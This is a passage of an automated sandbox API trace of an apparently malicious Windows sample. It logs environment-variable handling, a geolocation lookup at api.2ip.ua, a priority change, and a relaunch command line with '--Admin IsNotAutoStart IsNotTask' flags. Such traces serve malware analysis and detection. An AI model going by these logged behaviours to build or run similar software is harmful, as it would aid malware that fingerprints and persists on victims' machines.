(dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.568] SetLastError (dwErrCode=0x0) [0070.568] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.569] SetLastError (dwErrCode=0x0) [0070.569] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1600) returned 0x3c [0070.570] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1600, Size=0x40) returned 0x6a1600 [0070.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0070.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3e) returned 0x6955d8 [0070.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x6955d8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.570] GetLastError () returned 0x0 [0070.570] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.571] GetLastError () returned 0x0 [0070.571] SetLastError (dwErrCode=0x0) [0070.572] GetLastError () returned 0x0 [0070.572] SetLastError (dwErrCode=0x0) [0070.572] GetLastError () returned 0x0 [0070.572] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1600, Size=0x44) returned 0x6a16c0 [0070.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0070.572] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1b) returned 0x69ed00 [0070.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x69ed00, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0070.572] GetLastError () returned 0x0 [0070.572] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x48) returned 0x6a16c0 [0070.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0070.572] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1d) returned 0x69ed28 [0070.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x69ed28, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0070.572] GetLastError () returned 0x0 [0070.572] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x4c) returned 0x6a16c0 [0070.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0070.572] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x48) returned 0x6969c8 [0070.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x6969c8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0070.572] GetLastError () returned 0x0 [0070.573] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x50) returned 0x6a16c0 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0070.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x12) returned 0x6a1600 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6a1600, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0070.573] GetLastError () returned 0x0 [0070.573] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x54) returned 0x6a16c0 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x6a1620 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x6a1620, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0070.573] GetLastError () returned 0x0 [0070.573] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x58) returned 0x6a16c0 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0070.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1b) returned 0x69ed50 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x69ed50, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0070.573] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x5c) returned 0x6a16c0 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0070.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69a850 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x69a850, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0070.573] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x60) returned 0x6a16c0 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0070.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x29) returned 0x69af28 [0070.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x69af28, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0070.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x64) returned 0x6a16c0 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0070.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1e) returned 0x69ed78 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x69ed78, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0070.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x68) returned 0x6a16c0 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0070.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x41) returned 0x696a18 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x696a18, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0070.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x6c) returned 0x6a16c0 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x17) returned 0x6a1738 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x6a1738, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0070.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x70) returned 0x6a16c0 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0070.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xf) returned 0x69e520 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x69e520, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0070.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a16c0, Size=0x74) returned 0x6a1758 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0070.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x16) returned 0x6a16c0 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6a16c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0070.574] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x78) returned 0x6a1758 [0070.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0070.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2a) returned 0x69af60 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x69af60, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0070.575] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x7c) returned 0x6a1758 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0070.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x29) returned 0x69af98 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x69af98, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0070.575] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x80) returned 0x6a1758 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0070.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x15) returned 0x6a16e0 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6a16e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0070.575] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x84) returned 0x6a1758 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0070.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1e) returned 0x69eda0 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x69eda0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0070.575] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x88) returned 0x6a1758 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0070.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2a) returned 0x69afd0 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x69afd0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0070.575] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x8c) returned 0x6a1758 [0070.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0070.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x12) returned 0x6a1700 [0070.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6a1700, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0070.576] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x90) returned 0x6a1758 [0070.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x6a17f0 [0070.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6a17f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0070.576] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1758, Size=0x94) returned 0x6a1810 [0070.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0070.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x46) returned 0x696a68 [0070.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x696a68, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0070.576] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1810, Size=0x98) returned 0x6a1810 [0070.631] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.631] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.632] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8ec) returned 0x6a18b0 [0070.679] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x69e538 [0070.679] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.679] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.679] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.724] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.735] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0070.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695938 [0070.953] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0072.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b6f8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18def8 | out: lpBuffer=0x18b6f8*, lpdwNumberOfBytesRead=0x18def8*=0x1d1) returned 1 [0072.089] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0072.090] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0072.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6ad7e8 [0072.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1e0) returned 0x3193e68 [0072.126] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0072.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ad7e8 | out: hHeap=0x680000) returned 1 [0072.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695938 | out: hHeap=0x680000) returned 1 [0072.136] GetCurrentProcess () returned 0xffffffff [0072.136] GetLastError () returned 0x2 [0072.136] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0072.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6d16e8 [0072.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8ec) returned 0x31793e8 [0072.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x6d2120 [0072.162] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6d2120, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe")) returned 0x66 [0072.162] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0072.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x3179ce0 [0072.171] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0072.171] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18dfd8 | out: pNumArgs=0x18dfd8) returned 0x3141908*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0072.171] lstrcpyW (in: 